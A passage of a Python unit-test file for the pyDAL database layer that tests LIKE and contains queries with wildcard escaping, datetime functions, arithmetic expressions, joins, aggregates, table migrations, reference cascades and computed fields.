self.assertEqual(
db(db.tt.bb.contains("A", case_sensitive=False)).count(), 3
)
db.tt.drop()
# integers in string fields
db.define_table(
"tt",
Field("aa", "list:string"),
Field("bb", "string"),
Field("cc", "integer"),
)
self.assertEqual(db.tt.insert(aa=["123", "456"], bb="123", cc=12), 1)
if not IS_TERADATA:
self.assertEqual(db.tt.insert(aa=["124", "456"], bb="123", cc=123), 2)
self.assertEqual(db.tt.insert(aa=["125", "457"], bb="23", cc=125), 3)
else:
self.assertEqual(db.tt.insert(aa=["124", "456"], bb="123", cc=123), 1)
self.assertEqual(db.tt.insert(aa=["125", "457"], bb="23", cc=125), 1)
self.assertEqual(db(db.tt.aa.contains(123)).count(), 1)
self.assertEqual(db(db.tt.aa.contains(23)).count(), 0)
self.assertEqual(db(db.tt.aa.contains(db.tt.cc)).count(), 1)
self.assertEqual(db(db.tt.bb.contains(123)).count(), 2)
self.assertEqual(db(db.tt.bb.contains(23)).count(), 3)
self.assertEqual(db(db.tt.bb.contains(db.tt.cc)).count(), 2)
db.tt.drop()
# string field contains string field
db.define_table("tt", Field("aa"), Field("bb"))
db.tt.insert(aa="aaa", bb="%aaa")
db.tt.insert(aa="aaa", bb="aaa")
self.assertEqual(db(db.tt.aa.contains(db.tt.bb)).count(), 1)
db.tt.drop()
# escaping
db.define_table("tt", Field("aa"))
db.tt.insert(aa="perc%ent")
db.tt.insert(aa="percent")
db.tt.insert(aa="percxyzent")
db.tt.insert(aa="under_score")
db.tt.insert(aa="underxscore")
db.tt.insert(aa="underyscore")
self.assertEqual(db(db.tt.aa.contains("perc%ent")).count(), 1)
self.assertEqual(db(db.tt.aa.contains("under_score")).count(), 1)
class TestLike(DALtest):
def setUp(self):
db = self.connect()
db.define_table("tt", Field("aa"))
self.assertEqual(isinstance(db.tt.insert(aa="abc"), long), True)
self.db = db
def testRun(self):
db = self.db
self.assertEqual(db(db.tt.aa.like("a%")).count(), 1)
self.assertEqual(db(db.tt.aa.like("%b%")).count(), 1)
self.assertEqual(db(db.tt.aa.like("%c")).count(), 1)
self.assertEqual(db(db.tt.aa.like("%d%")).count(), 0)
self.assertEqual(db(db.tt.aa.like("ab_")).count(), 1)
self.assertEqual(db(db.tt.aa.like("a_c")).count(), 1)
self.assertEqual(db(db.tt.aa.like("_bc")).count(), 1)
self.assertEqual(db(db.tt.aa.like("A%", case_sensitive=False)).count(), 1)
self.assertEqual(db(db.tt.aa.like("%B%", case_sensitive=False)).count(), 1)
self.assertEqual(db(db.tt.aa.like("%C", case_sensitive=False)).count(), 1)
self.assertEqual(db(db.tt.aa.ilike("A%")).count(), 1)
self.assertEqual(db(db.tt.aa.ilike("%B%")).count(), 1)
self.assertEqual(db(db.tt.aa.ilike("%C")).count(), 1)
# DAL maps like() (and contains(), startswith(), endswith())
# to the LIKE operator, that in ANSI-SQL is case-sensitive
# There are backends supporting case-sensitivity by default
# and backends that needs additional care to turn
# case-sensitivity on. To discern among those, let's run
# this query comparing previously inserted 'abc' with 'ABC':
# if the result is 0, then the backend recognizes
# case-sensitivity, if 1 it isn't
is_case_insensitive = db(db.tt.aa.like("%ABC%")).count()
self.assertEqual(db(db.tt.aa.like("A%")).count(), is_case_insensitive)
self.assertEqual(db(db.tt.aa.like("%B%")).count(), is_case_insensitive)
self.assertEqual(db(db.tt.aa.like("%C")).count(), is_case_insensitive)
def testUpperLower(self):
db = self.db
self.assertEqual(db(db.tt.aa.upper().like("A%")).count(), 1)
self.assertEqual(db(db.tt.aa.upper().like("%B%")).count(), 1)
self.assertEqual(db(db.tt.aa.upper().like("%C")).count(), 1)
self.assertEqual(db(db.tt.aa.lower().like("%c")).count(), 1)
def testStartsEndsWith(self):
db = self.db
self.assertEqual(db(db.tt.aa.startswith("a")).count(), 1)
self.assertEqual(db(db.tt.aa.endswith("c")).count(), 1)
self.assertEqual(db(db.tt.aa.startswith("c")).count(), 0)
self.assertEqual(db(db.tt.aa.endswith("a")).count(), 0)
def testEscaping(self):
db = self.db
term = "ahbc".replace("h", "\\") # funny but to avoid any doubts...
db.tt.insert(aa="a%bc")
db.tt.insert(aa="a_bc")
db.tt.insert(aa=term)
self.assertEqual(db(db.tt.aa.like("%ax%bc%", escape="x")).count(), 1)
self.assertEqual(db(db.tt.aa.like("%ax_bc%", escape="x")).count(), 1)
self.assertEqual(db(db.tt.aa.like("%" + term + "%")).count(), 1)
db(db.tt.id > 0).delete()
# test "literal" like, i.e. exactly as LIKE in the backend
db.tt.insert(aa="perc%ent")
db.tt.insert(aa="percent")
db.tt.insert(aa="percxyzent")
db.tt.insert(aa="under_score")
db.tt.insert(aa="underxscore")
db.tt.insert(aa="underyscore")
self.assertEqual(db(db.tt.aa.like("%perc%ent%")).count(), 3)
self.assertEqual(db(db.tt.aa.like("%under_score%")).count(), 3)
db(db.tt.id > 0).delete()
# escaping with startswith and endswith
db.tt.insert(aa="%percent")
db.tt.insert(aa="xpercent")
db.tt.insert(aa="discount%")
db.tt.insert(aa="discountx")
self.assertEqual(db(db.tt.aa.endswith("discount%")).count(), 1)
self.assertEqual(db(db.tt.aa.like("discount%%")).count(), 2)
self.assertEqual(db(db.tt.aa.startswith("%percent")).count(), 1)
self.assertEqual(db(db.tt.aa.like("%%percent")).count(), 2)
@unittest.skipIf(IS_MSSQL, "No Regexp on MSSQL")
def testRegexp(self):
db = self.db
db(db.tt.id > 0).delete()
db.tt.insert(aa="%percent")
db.tt.insert(aa="xpercent")
db.tt.insert(aa="discount%")
db.tt.insert(aa="discountx")
try:
self.assertEqual(db(db.tt.aa.regexp("count")).count(), 2)
except NotImplementedError:
pass
else:
self.assertEqual(db(db.tt.aa.lower().regexp("count")).count(), 2)
self.assertEqual(
db(
db.tt.aa.upper().regexp("COUNT") & db.tt.aa.lower().regexp("count")
).count(),
2,
)
self.assertEqual(
db(
db.tt.aa.upper().regexp("COUNT") | (db.tt.aa.lower() == "xpercent")
).count(),
3,
)
def testLikeInteger(self):
db = self.db
db.tt.drop()
db.define_table("tt", Field("aa", "integer"))
self.assertEqual(isinstance(db.tt.insert(aa=1111111111), long), True)
self.assertEqual(isinstance(db.tt.insert(aa=1234567), long), True)
self.assertEqual(db(db.tt.aa.like("1%")).count(), 2)
self.assertEqual(db(db.tt.aa.like("1_3%")).count(), 1)
self.assertEqual(db(db.tt.aa.like("2%")).count(), 0)
self.assertEqual(db(db.tt.aa.like("_2%")).count(), 1)
self.assertEqual(db(db.tt.aa.like("12%")).count(), 1)
self.assertEqual(db(db.tt.aa.like("012%")).count(), 0)
self.assertEqual(db(db.tt.aa.like("%45%")).count(), 1)
self.assertEqual(db(db.tt.aa.like("%54%")).count(), 0)
class TestDatetime(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa", "datetime"))
self.assertEqual(db.tt.insert(aa=datetime.datetime(1971, 12, 21, 11, 30)), 1)
self.assertEqual(db.tt.insert(aa=datetime.datetime(1971, 11, 21, 10, 30)), 2)
self.assertEqual(db.tt.insert(aa=datetime.datetime(1970, 12, 21, 9, 31)), 3)
self.assertEqual(
db(db.tt.aa == datetime.datetime(1971, 12, 21, 11, 30)).count(), 1
)
self.assertEqual(db(db.tt.aa.year() == 1971).count(), 2)
self.assertEqual(db(db.tt.aa.month() > 11).count(), 2)
self.assertEqual(db(db.tt.aa.day() >= 21).count(), 3)
self.assertEqual(db(db.tt.aa.hour() < 10).count(), 1)
self.assertEqual(db(db.tt.aa.minutes() <= 30).count(), 2)
self.assertEqual(db(db.tt.aa.seconds() != 31).count(), 3)
self.assertEqual(db(db.tt.aa.epoch() < 365 * 24 * 3600).delete(), 1)
db.tt.drop()
# pure TIME types without dates are not possible in Oracle
if not IS_ORACLE:
db.define_table("tt", Field("aa", "time"))
t0 = datetime.time(10, 30, 55)
db.tt.insert(aa=t0)
self.assertEqual(db().select(db.tt.aa)[0].aa, t0)
db.tt.drop()
db.define_table("tt", Field("aa", "date"))
t0 = datetime.date.today()
db.tt.insert(aa=t0)
self.assertEqual(db().select(db.tt.aa)[0].aa, t0)
class TestExpressions(DALtest):
@unittest.skipIf(IS_POSTGRESQL, "PG8000 does not like these")
def testRun(self):
db = self.connect()
db.define_table(
"tt", Field("aa", "integer"), Field("bb", "integer"), Field("cc")
)
self.assertEqual(db.tt.insert(aa=1, bb=0), 1)
self.assertEqual(db.tt.insert(aa=2, bb=0), 2)
self.assertEqual(db.tt.insert(aa=3, bb=0), 3)
# test update
self.assertEqual(db(db.tt.aa == 3).update(aa=db.tt.aa + 1, bb=db.tt.bb + 2), 1)
self.assertEqual(db(db.tt.aa == 4).count(), 1)
self.assertEqual(db(db.tt.bb == 2).count(), 1)
self.assertEqual(db(db.tt.aa == -2).count(), 0)
self.assertEqual(db(db.tt.aa == 4).update(aa=db.tt.aa * 2, bb=5), 1)
self.assertEqual(db(db.tt.bb == 5).count(), 1)
self.assertEqual(db(db.tt.aa + 1 == 9).count(), 1)
self.assertEqual(db(db.tt.aa + 1 == 9).update(aa=db.tt.aa - 2, cc="cc"), 1)
self.assertEqual(db(db.tt.cc == "cc").count(), 1)
self.assertEqual(db(db.tt.aa == 6).count(), 1)
self.assertEqual(db(db.tt.aa == 6).update(bb=db.tt.aa * (db.tt.bb - 3)), 1)
self.assertEqual(db(db.tt.bb == 12).count(), 1)
self.assertEqual(db(db.tt.aa == 6).count(), 1)
self.assertEqual(
db(db.tt.aa == 6).update(aa=db.tt.aa % 4 + 1, cc=db.tt.cc + "1" + "1"), 1
)
self.assertEqual(db(db.tt.cc == "cc11").count(), 1)
self.assertEqual(db(db.tt.aa == 3).count(), 1)
# test comparsion expression based count
self.assertEqual(db(db.tt.aa != db.tt.aa).count(), 0)
self.assertEqual(db(db.tt.aa == db.tt.aa).count(), 3)
# test select aggregations
sum = (db.tt.aa + 1).sum()
self.assertEqual(db(db.tt.aa + 1 >= 3).select(sum).first()[sum], 7)
self.assertEqual(db((1 == 0) & (db.tt.aa >= db.tt.aa)).count(), 0)
self.assertEqual(db(db.tt.aa * 2 == -2).select(sum).first()[sum], None)
count = db.tt.aa.count()
avg = db.tt.aa.avg()
min = db.tt.aa.min()
max = db.tt.aa.max()
result = db(db.tt).select(sum, count, avg, min, max).first()
self.assertEqual(result[sum], 9)
self.assertEqual(result[count], 3)
self.assertEqual(result[avg], 2)
self.assertEqual(result[min], 1)
self.assertEqual(result[max], 3)
# Test basic expressions evaluated at python level
self.assertEqual(db((1 == 1) & (db.tt.aa >= 2)).count(), 2)
self.assertEqual(db((1 == 1) | (db.tt.aa >= 2)).count(), 3)
self.assertEqual(db((1 == 0) & (db.tt.aa >= 2)).count(), 0)
self.assertEqual(db((1 == 0) | (db.tt.aa >= 2)).count(), 2)
# test abs()
self.assertEqual(db(db.tt.aa == 2).update(aa=db.tt.aa * -10), 1)
abs = db.tt.aa.abs().with_alias("abs")
result = db(db.tt.aa == -20).select(abs).first()
self.assertEqual(result[abs], 20)
self.assertEqual(result["abs"], 20)
abs = db.tt.aa.abs() / 10 + 5
exp = abs.min() * 2 + 1
result = db(db.tt.aa == -20).select(exp).first()
self.assertEqual(result[exp], 15)
# test case()
condition = db.tt.aa > 2
case = condition.case(db.tt.aa + 2, db.tt.aa - 2)
my_case = case.with_alias("my_case")
result = db().select(my_case)
self.assertEqual(len(result), 3)
self.assertEqual(result[0][my_case], -1)
self.assertEqual(result[0]["my_case"], -1)
self.assertEqual(result[1]["my_case"], -22)
self.assertEqual(result[2]["my_case"], 5)
# test expression based delete
self.assertEqual(db(db.tt.aa + 1 >= 4).count(), 1)
self.assertEqual(db(db.tt.aa + 1 >= 4).delete(), 1)
self.assertEqual(db(db.tt.aa).count(), 2)
def testUpdate(self):
db = self.connect()
# some db's only support seconds
datetime_datetime_today = datetime.datetime.today()
datetime_datetime_today = datetime_datetime_today.replace(microsecond=0)
one_day = datetime.timedelta(1)
one_sec = datetime.timedelta(0, 1)
update_vals = (
("string", "x", "y"),
("text", "x", "y"),
("password", "x", "y"),
("integer", 1, 2),
("bigint", 1, 2),
("float", 1.0, 2.0),
("double", 1.0, 2.0),
("boolean", True, False),
("date", datetime.date.today(), datetime.date.today() + one_day),
(
"datetime",
datetime.datetime(1971, 12, 21, 10, 30, 55, 0),
datetime_datetime_today,
),
(
"time",
datetime_datetime_today.time(),
(datetime_datetime_today + one_sec).time(),
),
)
for uv in update_vals:
if IS_ORACLE and (uv[0] == "time" or uv[0] == "text"):
# oracle can have problems with this test on CLOBs
# and date-less "time" type is not supported
continue
db.define_table("tt", Field("aa", "integer", default=0), Field("bb", uv[0]))
self.assertTrue(isinstance(db.tt.insert(bb=uv[1]), long))
self.assertEqual(db(db.tt.aa + 1 == 1).select(db.tt.bb)[0].bb, uv[1])
self.assertEqual(db(db.tt.aa + 1 == 1).update(bb=uv[2]), 1)
self.assertEqual(db(db.tt.aa / 3 == 0).select(db.tt.bb)[0].bb, uv[2])
db.tt.drop()
def testSubstring(self):
db = self.connect()
t0 = db.define_table("t0", Field("name"))
input_name = "web2py"
t0.insert(name=input_name)
exp_slice = t0.name.lower()[4:6]
exp_slice_no_max = t0.name.lower()[4:]
exp_slice_neg_max = t0.name.lower()[2:-2]
exp_slice_neg_start = t0.name.lower()[-2:]
exp_item = t0.name.lower()[3]
out = (
db(t0)
.select(
exp_slice,
exp_item,
exp_slice_no_max,
exp_slice_neg_max,
exp_slice_neg_start,
)
.first()
)
self.assertEqual(out[exp_slice], input_name[4:6])
self.assertEqual(out[exp_item], input_name[3])
self.assertEqual(out[exp_slice_no_max], input_name[4:])
self.assertEqual(out[exp_slice_neg_max], input_name[2:-2])
self.assertEqual(out[exp_slice_neg_start], input_name[-2:])
def testOps(self):
db = self.connect()
t0 = db.define_table("t0", Field("vv", "integer"))
self.assertEqual(db.t0.insert(vv=1), 1)
self.assertEqual(db.t0.insert(vv=2), 2)
self.assertEqual(db.t0.insert(vv=3), 3)
sum = db.t0.vv.sum()
count = db.t0.vv.count()
avg = db.t0.vv.avg()
op = sum / count
op1 = (sum / count).with_alias("tot")
self.assertEqual(db(t0).select(op).first()[op], 2)
self.assertEqual(db(t0).select(op1).first()[op1], 2)
print("DICT", db(t0).select(op1).as_dict())
self.assertEqual(db(t0).select(op1).first()["tot"], 2)
op2 = avg * count
self.assertEqual(db(t0).select(op2).first()[op2], 6)
# the following is not possible at least on sqlite
sum = db.t0.vv.sum().with_alias("s")
count = db.t0.vv.count().with_alias("c")
op = sum / count
# self.assertEqual(db(t0).select(op).first()[op], 2)
class TestTableAliasing(DALtest):
def testRun(self):
db = self.connect()
db.define_table("t1", Field("aa"))
db.define_table(
"t2",
Field("pk", type="id", unique=True, notnull=True),
Field("bb", type="integer"),
rname="tt",
)
tab1 = db.t1.with_alias("test1")
tab2 = db.t2.with_alias("test2")
self.assertIs(tab2.id, tab2.pk)
self.assertIs(tab2._id, tab2.pk)
self.assertEqual(tab1._dalname, "t1")
self.assertEqual(tab1._tablename, "test1")
self.assertEqual(tab2._dalname, "t2")
self.assertEqual(tab2._tablename, "test2")
self.assertEqual(tab2._rname, "tt")
tab1.insert(aa="foo")
tab1.insert(aa="bar")
result = db(tab1).select(tab1.aa, orderby=tab1.aa)
self.assertEqual(result.as_list(), [{"aa": "bar"}, {"aa": "foo"}])
if not IS_SQLITE:
db(tab1.aa == "foo").update(aa="baz")
result = db(tab1).select(tab1.aa, orderby=tab1.aa)
self.assertEqual(result.as_list(), [{"aa": "bar"}, {"aa": "baz"}])
db(tab1.aa == "bar").delete()
result = db(tab1).select(tab1.aa, orderby=tab1.aa)
self.assertEqual(result.as_list(), [{"aa": "baz"}])
else:
with self.assertRaises(SyntaxError):
db(tab1.aa == "foo").update(aa="baz")
with self.assertRaises(SyntaxError):
db(tab1.aa == "bar").delete()
tab2.insert(bb=123)
tab2.insert(bb=456)
result = db(tab2).select(tab2.bb, orderby=tab2.bb)
self.assertEqual(result.as_list(), [{"bb": 123}, {"bb": 456}])
if not IS_SQLITE:
db(tab2.bb == 456).update(bb=789)
result = db(tab2).select(tab2.bb, orderby=tab2.bb)
self.assertEqual(result.as_list(), [{"bb": 123}, {"bb": 789}])
db(tab2.bb == 123).delete()
result = db(tab2).select(tab2.bb, orderby=tab2.bb)
self.assertEqual(result.as_list(), [{"bb": 789}])
else:
with self.assertRaises(SyntaxError):
db(tab2.bb == 456).update(bb=789)
with self.assertRaises(SyntaxError):
db(tab2.bb == 123).delete()
class TestJoin(DALtest):
def testRun(self):
db = self.connect()
db.define_table("t1", Field("aa"))
db.define_table("t2", Field("aa"), Field("b", db.t1))
i1 = db.t1.insert(aa="1")
i2 = db.t1.insert(aa="2")
i3 = db.t1.insert(aa="3")
db.t2.insert(aa="4", b=i1)
db.t2.insert(aa="5", b=i2)
db.t2.insert(aa="6", b=i2)
self.assertEqual(
len(db(db.t1.id == db.t2.b).select(orderby=db.t1.aa | db.t2.aa)), 3
)
self.assertEqual(
db(db.t1.id == db.t2.b).select(orderby=db.t1.aa | db.t2.aa)[2].t1.aa, "2"
)
self.assertEqual(
db(db.t1.id == db.t2.b).select(orderby=db.t1.aa | db.t2.aa)[2].t2.aa, "6"
)
self.assertEqual(
len(
db().select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)
),
4,
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[2]
.t1.aa,
"2",
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[2]
.t2.aa,
"6",
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[3]
.t1.aa,
"3",
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[3]
.t2.aa,
None,
)
self.assertEqual(
len(
db().select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)
),
3,
)
self.assertEqual(
db()
.select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)[0]
._extra[db.t2.id.count()],
1,
)
self.assertEqual(
db()
.select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)[1]
._extra[db.t2.id.count()],
2,
)
self.assertEqual(
db()
.select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)[2]
._extra[db.t2.id.count()],
0,
)
db.t2.drop()
db.t1.drop()
db.define_table("person", Field("name"))
id = db.person.insert(name="max")
self.assertEqual(id.name, "max")
db.define_table("dog", Field("name"), Field("ownerperson", "reference person"))
db.dog.insert(name="skipper", ownerperson=1)
row = db(db.person.id == db.dog.ownerperson).select().first()
self.assertEqual(row[db.person.name], "max")
self.assertEqual(row["person.name"], "max")
db.dog.drop()
self.assertEqual(len(db.person._referenced_by), 0)
class TestMinMaxSumAvg(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa", "integer"))
self.assertEqual(db.tt.insert(aa=1), 1)
self.assertEqual(db.tt.insert(aa=2), 2)
self.assertEqual(db.tt.insert(aa=3), 3)
s = db.tt.aa.min()
self.assertEqual(db(db.tt.id > 0).select(s)[0]._extra[s], 1)
self.assertEqual(db(db.tt.id > 0).select(s).first()[s], 1)
self.assertEqual(db().select(s).first()[s], 1)
s = db.tt.aa.max()
self.assertEqual(db().select(s).first()[s], 3)
s = db.tt.aa.sum()
self.assertEqual(db().select(s).first()[s], 6)
s = db.tt.aa.count()
self.assertEqual(db().select(s).first()[s], 3)
s = db.tt.aa.avg()
self.assertEqual(db().select(s).first()[s], 2)
class TestMigrations(unittest.TestCase):
def testRun(self):
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table("tt", Field("aa"), Field("BB"), migrate=".storage.table")
db.define_table(
"t1", Field("aa"), Field("BB"), migrate=".storage.rname", rname="foo"
)
db.commit()
db.close()
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table("tt", Field("aa"), migrate=".storage.table")
db.define_table("t1", Field("aa"), migrate=".storage.rname", rname="foo")
db.commit()
db.close()
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table("tt", Field("aa"), Field("b"), migrate=".storage.table")
db.define_table(
"t1", Field("aa"), Field("b"), migrate=".storage.rname", rname="foo"
)
db.commit()
db.close()
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table("tt", Field("aa"), Field("b", "text"), migrate=".storage.table")
db.define_table(
"t1", Field("aa"), Field("b", "text"), migrate=".storage.rname", rname="foo"
)
db.commit()
db.close()
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table("tt", Field("aa"), migrate=".storage.table")
db.define_table("t1", Field("aa"), migrate=".storage.rname", rname="foo")
db.tt.drop()
db.t1.drop()
db.commit()
db.close()
def testFieldRName(self):
def checkWrite(db, table, data):
rowid = table.insert(**data)
query = table._id == rowid
fields = [table[x] for x in data.keys()]
row = db(query).select(*fields).first()
self.assertIsNot(row, None)
self.assertEqual(row.as_dict(), data)
db(query).delete()
# Create tables
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table(
"tt",
Field("aa", rname="faa"),
Field("BB", rname="fbb"),
migrate=".storage.table",
)
db.define_table(
"t1",
Field("aa", rname="faa"),
Field("BB", rname="fbb"),
migrate=".storage.rname",
rname="foo",
)
data = dict(aa="aa1", BB="BB1")
checkWrite(db, db.tt, data)
checkWrite(db, db.t1, data)
db.commit()
db.close()
# Drop field defined by CREATE TABLE
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table("tt", Field("aa", rname="faa"), migrate=".storage.table")
db.define_table(
"t1", Field("aa", rname="faa"), migrate=".storage.rname", rname="foo"
)
data = dict(aa="aa2")
checkWrite(db, db.tt, data)
checkWrite(db, db.t1, data)
db.commit()
db.close()
# Add new field
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table(
"tt",
Field("aa", rname="faa"),
Field("b", rname="fb"),
migrate=".storage.table",
)
db.define_table(
"t1",
Field("aa", rname="faa"),
Field("b", rname="fb"),
migrate=".storage.rname",
rname="foo",
)
data = dict(aa="aa3", b="b3")
integrity = dict(aa="data", b="integrity")
checkWrite(db, db.tt, data)
checkWrite(db, db.t1, data)
db.tt.insert(**integrity)
db.t1.insert(**integrity)
db.commit()
db.close()
if not IS_SQLITE:
# Change field type
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table(
"tt",
Field("aa", rname="faa"),
Field("b", "text", rname="fb"),
migrate=".storage.table",
)
db.define_table(
"t1",
Field("aa", rname="faa"),
Field("b", "text", rname="fb"),
migrate=".storage.rname",
rname="foo",
)
data = dict(aa="aa4", b="b4")
checkWrite(db, db.tt, data)
checkWrite(db, db.t1, data)
row = db(db.tt).select(*[db.tt[x] for x in integrity.keys()]).first()
self.assertIsNot(row, None)
self.assertEqual(row.as_dict(), integrity)
row2 = db(db.t1).select(*[db.t1[x] for x in integrity.keys()]).first()
self.assertIsNot(row2, None)
self.assertEqual(row2.as_dict(), integrity)
db.commit()
db.close()
if not IS_SQLITE:
# Change field rname
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table(
"tt",
Field("aa", rname="faa"),
Field("b", "text", rname="xb"),
migrate=".storage.table",
)
db.define_table(
"t1",
Field("aa", rname="faa"),
Field("b", "text", rname="xb"),
migrate=".storage.rname",
rname="foo",
)
data = dict(aa="aa4", b="b4")
checkWrite(db, db.tt, data)
checkWrite(db, db.t1, data)
row = db(db.tt).select(*[db.tt[x] for x in integrity.keys()]).first()
self.assertIsNot(row, None)
self.assertEqual(row.as_dict(), integrity)
row2 = db(db.t1).select(*[db.t1[x] for x in integrity.keys()]).first()
self.assertIsNot(row2, None)
self.assertEqual(row2.as_dict(), integrity)
db.commit()
db.close()
# Drop field defined by ALTER TABLE
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table("tt", Field("aa", rname="faa"), migrate=".storage.table")
db.define_table(
"t1", Field("aa", rname="faa"), migrate=".storage.rname", rname="foo"
)
data = dict(aa="aa5")
checkWrite(db, db.tt, data)
checkWrite(db, db.t1, data)
db.tt.drop()
db.t1.drop()
db.commit()
db.close()
def tearDown(self):
if os.path.exists(".storage.db"):
os.unlink(".storage.db")
if os.path.exists(".storage.table"):
os.unlink(".storage.table")
if os.path.exists(".storage.rname"):
os.unlink(".storage.rname")
class TestReference(DALtest):
def testRun(self):
scenarios = (
(True, "CASCADE"),
(False, "CASCADE"),
(False, "SET NULL"),
)
for (b, ondelete) in scenarios:
db = self.connect(bigint_id=b)
if DEFAULT_URI.startswith("mssql"):
# multiple cascade gotcha
for key in ["reference", "reference FK"]:
db._adapter.types[key] = db._adapter.types[key].replace(
"%(on_delete_action)s", "NO ACTION"
)
db.define_table(
"tt", Field("name"), Field("aa", "reference tt", ondelete=ondelete)
)
db.commit()
x = db.tt.insert(name="xxx")
self.assertEqual(x.id, 1)
self.assertEqual(x["id"], 1)
x.aa = x
self.assertEqual(x.aa, 1)
x.update_record()
x1 = db.tt[1]
self.assertEqual(x1.aa, 1)
self.assertEqual(x1.aa.aa.aa.aa.aa.aa.name, "xxx")
y = db.tt.insert(name="yyy", aa=x1)
self.assertEqual(y.aa, x1.id)
if not DEFAULT_URI.startswith("mssql"):
self.assertEqual(db.tt.insert(name="zzz"), 3)
self.assertEqual(db(db.tt.name).count(), 3)
db(db.tt.id == x).delete()
expected_count = {
"SET NULL": 2,
"NO ACTION": 2,
"CASCADE": 1,
}
self.assertEqual(db(db.tt.name).count(), expected_count[ondelete])
if ondelete == "SET NULL":
self.assertEqual(db(db.tt.name == "yyy").select()[0].aa, None)
self.tearDown()
class TestClientLevelOps(DALtest):
def testRun(self):
db = self.connect()
db.define_table(
"tt",
Field("aa", represent=lambda x, r: "x" + x),
Field("bb", type="integer", represent=lambda x, r: "y" + str(x)),
)
db.commit()
db.tt.insert(aa="test", bb=1)
rows1 = db(db.tt.id < 0).select()
rows2 = db(db.tt.id > 0).select()
self.assertNotEqual(rows1, rows2)
rows1 = db(db.tt.id > 0).select()
rows2 = db(db.tt.id > 0).select()
self.assertEqual(rows1, rows2)
rows3 = rows1 + rows2
self.assertEqual(len(rows3), 2)
rows4 = rows1 | rows2
self.assertEqual(len(rows4), 1)
rows5 = rows1 & rows2
self.assertEqual(len(rows5), 1)
rows6 = rows1.find(lambda row: row.aa == "test")
self.assertEqual(len(rows6), 1)
rows7 = rows2.exclude(lambda row: row.aa == "test")
self.assertEqual(len(rows7), 1)
rows8 = rows5.sort(lambda row: row.aa)
self.assertEqual(len(rows8), 1)
def represent(f, v, r):
return "z" + str(v)
db.representers = {
"rows_render": represent,
}
db.tt.insert(aa="foo", bb=2)
rows = db(db.tt.id > 0).select()
exp1 = [
Row(aa="ztest", bb="z1", id=rows[0]["id"]),
Row(aa="zfoo", bb="z2", id=rows[1]["id"]),
]
exp2 = [
Row(aa="ztest", bb=1, id=rows[0]["id"]),
Row(aa="zfoo", bb=2, id=rows[1]["id"]),
]
exp3 = [
Row(aa="test", bb="z1", id=rows[0]["id"]),
Row(aa="foo", bb="z2", id=rows[1]["id"]),
]
self.assertEqual(rows.render(i=0), exp1[0])
self.assertEqual(rows.render(i=0, fields=[db.tt.aa, db.tt.bb]), exp1[0])
self.assertEqual(rows.render(i=0, fields=[db.tt.aa]), exp2[0])
self.assertEqual(rows.render(i=0, fields=[db.tt.bb]), exp3[0])
self.assertEqual(list(rows.render()), exp1)
self.assertEqual(list(rows.render(fields=[db.tt.aa, db.tt.bb])), exp1)
self.assertEqual(list(rows.render(fields=[db.tt.aa])), exp2)
self.assertEqual(list(rows.render(fields=[db.tt.bb])), exp3)
ret = rows.render(i=0)
rows = db(db.tt.id > 0).select()
rows.compact = False
row = rows[0]
self.assertIn("tt", row)
self.assertIn("id", row.tt)
self.assertNotIn("id", row)
rows.compact = True
row = rows[0]
self.assertNotIn("tt", row)
self.assertIn("id", row)
rows = db(db.tt.id > 0).select(db.tt.id.max())
rows.compact = False
row = rows[0]
self.assertNotIn("tt", row)
self.assertIn("_extra", row)
rows = db(db.tt.id > 0).select(db.tt.id.max())
rows.compact = True
row = rows[0]
self.assertNotIn("tt", row)
self.assertIn("_extra", row)
db.tt.drop()
db.define_table("tt", Field("aa"), Field.Virtual("bb", lambda row: ":p"))
db.tt.insert(aa="test")
rows = db(db.tt.id > 0).select()
row = rows.first()
self.assertNotIn("tt", row)
self.assertIn("id", row)
self.assertIn("bb", row)
rows.compact = False
row = rows.first()
self.assertIn("tt", row)
self.assertEqual(len(row.keys()), 1)
self.assertIn("id", row.tt)
self.assertIn("bb", row.tt)
self.assertNotIn("id", row)
self.assertNotIn("bb", row)
class TestVirtualFields(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa"))
db.commit()
db.tt.insert(aa="test")
class Compute:
def a_upper(row):
return row.tt.aa.upper()
db.tt.virtualfields.append(Compute())
assert db(db.tt.id > 0).select().first().a_upper == "TEST"
class TestComputedFields(DALtest):
def testRun(self):
db = self.connect()
db.define_table(
"tt",
Field("aa"),
Field("bb", default="x"),
Field("cc", compute=lambda r: r.aa + r.bb),
)
db.commit()
id = db.tt.insert(aa="z")
self.assertEqual(db.tt[id].cc, "zx")
db.tt.drop()
